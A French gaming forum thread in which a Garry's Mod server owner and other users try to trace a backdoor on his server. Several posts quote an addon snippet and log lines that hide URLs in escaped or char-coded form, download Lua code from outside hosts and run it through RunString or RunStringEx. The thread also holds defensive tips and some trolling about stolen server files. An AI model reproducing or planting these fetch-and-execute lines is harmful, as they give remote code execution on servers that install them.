Un backdoor ?

[xSploit]

Bonsoir,

Un joueur a réussis à trouver le mot de passe de mon serveur et, en tapant son steamid sur google, mince, je tombe sur une conversation mTx.
Je viens de lancer un braxscan mais rien de bien méchant à signaler, le code doit-être obfuscé...
La personne est connu sous le nom de LeFaux, SteamID : STEAM_0:0:210637209 (déjà dans le sourceban)
Ma collection : http://steamcommunity.com/sharedfiles/filedetails/?id=1113410724

D'avance merci,
Cordialement,
xSploit.

 

[Yoh Sambre ♪]

laisse moi deviné > utilisation du luarun ou exec ?

 

[xSploit]

Ou puis-je voir ça ?

 

[Yoh Sambre ♪]

logs

 

[xSploit]

D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)

 

[Yoh Sambre ♪]

D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)

LIEN DE L'ADDON

 

[xSploit]

Tien, le voilà, http://steamcommunity.com/sharedfiles/filedetails/?id=1084512055&searchtext=ATM
Ah, j'ai trouver ça dans mes logs (Willia ANDERSON c'est moi, c'est assez bizard ...)

(SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
ServerLog: [ULX] (SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
L 01/12/2018 - 17:51:08: [ULX] (SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)

 

[xSploit]

Vous pouvez savoir de quel addon ça vient ?

 

[Mika Deagle]

D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)

J'avais aussi vu sa dans le fichier.

 

[Mika Deagle]

Vous pouvez savoir de quel addon ça vient ?

je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !

 

[Yoh Sambre ♪]

je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !

ptdr non

 

[xSploit]

je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !

J'ai dé-compiler ya rien ... @Yoh Sambre ♪ je comptais sur toi pour m'éclairer

 

[Yoh Sambre ♪]

J'ai dé-compiler ya rien ... @Yoh Sambre ♪ je comptais sur toi pour m'éclairer

j'ai écrit un peu plus haut

ptdr non

j'ai check en gros..

 

[xSploit]

j'ai écrit un peu plus haut



j'ai check en gros..

Et donc ? Que dois-je faire ? :x

 

[Yoh Sambre ♪]

Et donc ? Que dois-je faire ? :x

j'ai envoyer un MP a maks au sujet du panel que l'on connait (il s'agit d'un panel déja spotted) a voir le retour ,

en attendant je peux t'aider a étre un peu plus a l'abri (2/3 manips easy a faire)

 

[xSploit]

D'accord, j'aimerais virer la backdoor quoi, si tu peux m'aider c'est cool
Es-tu sur que c'est bien cet addon qui est backdoor, parce que jusque la je n'avais aucun problème. (Au passage, lien du profil steam du mec qui backdoor : http://steamcommunity.com/profiles/76561198381540146)

 

[Yoh Sambre ♪]

D'accord, j'aimerais virer la backdoor quoi, si tu peux m'aider c'est cool
Es-tu sur que c'est bien cet addon qui est backdoor, parce que jusque la je n'avais aucun problème. (Au passage, lien du profil steam du mec qui backdoor : http://steamcommunity.com/profiles/76561198381540146)

go TS de mtx

 

[xSploit]

go TS de mtx

Puis-je avoir l'IP ?

 

[ZarosOVH]

Puis-je avoir l'IP ?

talk.mtxserv.fr

 

[elessaro34]

Hello, pour le code dans l'ATM c'était à la base un DRM, mais finalement j'ai realease l'ATM donc autant release tout le code avec ^^ Je vais update pour enlever cette ligne

 

[Mika Deagle]

Désolé c'est moi qui est Backdoor j'aime bien

 

[BilalPrisel]

Parler de panel qu'alors le code est crypté , de vrai codeur qu'ont a la dite donc !

 

[FrenchNeo]

D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)

traduction

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch(" http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
end)

 

[xSploit]

Désolé c'est moi qui est Backdoor j'aime bien

Ptdr alors c'est quel addon ?

 

[BilalPrisel]

traduction

--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch(" http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
end)

Fake

 

[Mika Deagle]

Ptdr alors c'est quel addon ?

il te troll

 

[xSploit]

Du coup, personne n'as vraiment trouvé un addon frauduleux ici : http://steamcommunity.com/sharedfiles/filedetails/?id=1113410724 ?
Au passage, @Yoh Sambre ♪ pourquoi ne pas comparer le workshop du serveur du canadien et le mien ?

 

[xSploit]

Après discussions avec le gars, il veux ps me dire ce que c'est, et qu'on est à côté de la plaque et que c'est pas un backdoor..
Il veux pas me le dire...

 

[BilalPrisel]

Après discussions avec le gars, il veux ps me dire ce que c'est, et qu'on est à côté de la plaque et que c'est pas un backdoor..
Il veux pas me le dire...

Peut-être parceque les français sont détestés par les anglais à cause des types comme @Yoh Sambre ♪

 

[xSploit]

Il vient de me dire qu'il pouvait uniquement trouver les mots de passes (et au passage, askip c'est un "RCE")

 

[Dynastix]

Il vient de me dire qu'il pouvait uniquement trouver les mots de passes (et au passage, askip c'est un "RCE")

LeFaux: c'est une 0day MDRR MOI AUSSI IL MA FAIT SA A MON SERV

 

[xSploit]

LeFaux: c'est une 0day MDRR MOI AUSSI IL MA FAIT SA A MON SERV

As-tu réussis à corriger le problème ? Après ce qui est bizard c'est que quand je demande qu'il sorte le mot de passe de mon serveur, j'ai des serveurs chelou avec des hooks dans mes logs...

 

[Dynastix]

As-tu réussis à corriger le problème ? Après ce qui est bizard c'est que quand je demande qu'il sorte le mot de passe de mon serveur, j'ai des serveurs chelou avec des hooks dans mes logs...

change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.

 

[xSploit]

change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.

Déjà fait.. Il a ressortit mon mdp

 

[Dynastix]

Déjà fait.. Il a ressortit mon mdp

mdp mtx?

 

[xSploit]

mdp mtx?

Non, le mot de passe de mon serveur.

 

[Dynastix]

Déjà fait.. Il a ressortit mon mdp

sinon vien discord Zernax#6777

 

[xSploit]

sinon vien discord Zernax#6777

Je t'ai ajouté

 

[xSploit]

En tous cas, si quelqu'un trouve une solution, je suis preneur !!

 

[Malcolm]

J'ai regarder les addons les plus récents de ta collection (Décembre 2017/Janvier 2018) et je n'ai rien vu de suspect que des véhicules.

change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.

La dernière édition date de 2013

, ça m'étonnerai.

 

[Abstract Exo]

En tous cas, si quelqu'un trouve une solution, je suis preneur !!

 

[xSploit]

UP svp

 

[BilalPrisel]

UP svp

Arrete de up ton serveur s’est fait hacké par celui qui ta filesteal et tu peut rien faire d’autres.

 

[xSploit]

Arrete de up ton serveur s’est fait hacké par celui qui ta filesteal et tu peut rien faire d’autres.

Non, étant que c'est toi le filestealer de mon serveur.. (Le même pseudo qui a upload le filesteal de mon serveur et celui de Yoh Sambre)

 

[Yoh Sambre ♪]

Non, étant que c'est toi le filestealer de mon serveur.. (Le même pseudo qui a upload le filesteal de mon serveur et celui de Yoh Sambre)

J'ajouterai juste que si des gens sont intéressé pour avoir leur propre serveur sandbox remplis d'exclu incroyable n'attendez plus et contactez moi en mp pour avoir le lien officiel de ASS sur veryLush !

 

[ZarosOVH]

J'ajouterai juste que si des gens sont intéressé pour avoir leur propre serveur sandbox remplis d'exclu incroyable n'attendez plus et contactez moi en mp pour avoir le lien officiel de ASS sur veryLush !

Et ceux qui veulent le côté server contacter moi

 

[xSploit]

Bon, je vois que personne n'est en mesure de m'aider ici..

 

[Malcolm]

T'as bien vérifié ton ftp ?

 

[xSploit]

Oui ^^

 

[xSploit]

UP svp